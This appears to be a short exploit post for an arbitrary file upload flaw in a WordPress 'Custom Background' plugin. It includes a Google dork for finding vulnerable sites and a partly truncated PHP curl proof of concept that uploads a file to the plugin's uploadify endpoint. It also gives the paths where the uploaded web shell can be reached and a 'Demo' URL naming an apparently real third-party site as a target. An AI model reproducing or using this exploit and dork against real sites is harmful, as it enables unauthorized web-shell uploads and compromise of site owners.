###################################################################################### # Exploit Title : WordPress Custom Background Shell Upload # Google Dork : inurl:"/wp-content/plugins/custom-background/" # Date : 23-03-2014 # Exploit Author : CaFc Versace # Tested on : Windows 7 # Contact : dwi[@]cooyy.net, cafc[@]surabayablackhat.org ####################################################################################### Prooft: ------------------------------------------------------------------------------------- "@$uploadfile", 'folder'=>'/wp-content/plugins/custom-background/uploadify/')); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> ------------------------------------------------------------------------------------- Exploit: ------------------------------------------------------------------------------------- Shell Access : http://localhost/wp-content/plugins/custom-background/uploadify/cafc.php.jpg or find ur shell at : http://localhost/wp-content/uploads/[years]/[month]/ --------------------------------------------------------------------------------------- Demo : http://lakeofthewoodsmn.com/wp-content/plugins/custom-background/uploadify/uploadify.php --------------------------------------------------------------------------------------- Credits: Agency CaFc Thanks : SurabayaBlackhat ./learn to be better